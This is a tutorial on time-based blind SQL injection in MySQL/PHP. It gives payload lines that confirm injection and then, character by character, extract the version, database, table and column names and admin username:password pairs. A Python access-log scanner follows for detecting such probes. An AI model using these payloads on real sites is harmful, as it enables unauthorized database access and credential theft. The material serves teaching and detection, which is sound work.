
MySQL + PHP manual injection: time-based injection

Time-based injection is a form of blind injection: it relies on MySQL's sleep() function to introduce a measurable delay in the response.

sleep() is usually used together with if().

For example: select if(1=1,sleep(3),0) means: if 1=1 holds, delay for 3 s; otherwise return 0.

The method for time-based injection is to first obtain the length of the data, then use that length to query the content itself.

Checking for injection

and sleep(3): if an injection point exists, the page response will be delayed by 3 s.

Getting the MySQL version

First determine the length of the version string, then test each character one by one.

length()     returns the length of a string
substring()  extracts characters from a string
ascii()      returns the ASCII code of a character

id=1 and if(length(version())=6,sleep(3),0)

and if(ascii(substring(version(),1,1))=53,sleep(5),0)
and if(ascii(substring(version(),2,1))=46,sleep(5),0)
and if(ascii(substring(version(),3,1))=53,sleep(5),0)
and if(ascii(substring(version(),4,1))=46,sleep(5),0)
and if(ascii(substring(version(),5,1))=52,sleep(5),0)
and if(ascii(substring(version(),6,1))=54,sleep(5),0)

Getting database names

and if(length((select schema_name from information_schema.schemata limit 0,1))=10,sleep(5),0)

and if(ascii(substring((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),0)

Getting table names

and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=34,sleep(5),0)

and if(ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=100,sleep(5),0)

Getting column names

if(LENGTH((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e))=20,sleep(5),0)

if(ascii(SUBSTRING((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e),1,1))=105,sleep(5),0)

Getting data

if(LENGTH((select GROUP_CONCAT(username,0x3a,password)from admin))=38,sleep(5),5)

if(ascii(substring((select GROUP_CONCAT(username,0x3a,password)from admin),1,1))=105,sleep(5),5)
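From the defender's side, every probe above leaves the same fingerprint in the web server's access log: a delay primitive (sleep() or benchmark()) wrapped in if(), usually next to ascii()/substring()/length() or an information_schema lookup, followed by a response that takes as long as the requested sleep. The scanner below is an added example, not code from the original post; it assumes a common-log-format line with the response time in milliseconds as the last field, and the log lines it runs on are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Payload shapes taken from the probes in this post (case-insensitive).
DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)                      # delay primitive
EXTRACT_RE = re.compile(r"\b(ascii|substring|substr|mid|length)\s*\(", re.I)  # char/length probe
SCHEMA_RE = re.compile(r"information_schema\.", re.I)                         # metadata enumeration

# Assumed log layout: common log format plus response time in ms as the last field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) (?P<ms>\d+)$'
)

def classify(line, slow_ms=3000):
    """Classify one access-log line; returns a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode percent-encoding so 'sleep%285%29' is inspected as 'sleep(5)'.
    query = unquote_plus(m.group("url")).partition("?")[2]
    delay = bool(DELAY_RE.search(query))
    if delay and (EXTRACT_RE.search(query) or SCHEMA_RE.search(query)):
        verdict = "blind-sqli-extraction"   # length/char test wrapped in a delay
    elif delay:
        verdict = "blind-sqli-probe"        # bare 'and sleep(n)' injection test
    else:
        verdict = "benign"
    # A delay marker plus a slow response means the sleep() actually executed.
    slow = int(m.group("ms")) >= slow_ms
    return {"ip": m.group("ip"), "query": query, "verdict": verdict,
            "executed": delay and slow}

def scan(lines, slow_ms=3000):
    """Return the parsed records for every suspicious line."""
    hits = (classify(l, slow_ms) for l in lines)
    return [h for h in hits if h and h["verdict"] != "benign"]

# Constructed sample lines (not real traffic); 'id' is the injected parameter.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=1 HTTP/1.1" 200 512 45',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /news.php?id=1%20and%20sleep(3) HTTP/1.1" 200 512 3021',
    '203.0.113.7 - - [10/Oct/2023:13:55:50 +0000] "GET /news.php?id=1%20and%20if(ascii(substring(version(),1,1))=53,sleep(5),0) HTTP/1.1" 200 512 5008',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /news.php?id=1%20and%20if(length((select%20schema_name%20from%20information_schema.schemata%20limit%200,1))=10,sleep(5),0) HTTP/1.1" 200 512 5011',
    '198.51.100.9 - - [10/Oct/2023:13:56:10 +0000] "GET /search.php?q=sleeping%20bag HTTP/1.1" 200 2048 60',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["verdict"], "executed" if hit["executed"] else "attempted", hit["query"])
```

The "executed" flag is the useful one: a delay payload that did not slow the response was blocked or never reached the database, while one that did confirms the parameter is injectable and the fix (a prepared statement for id in the PHP handler) is urgent.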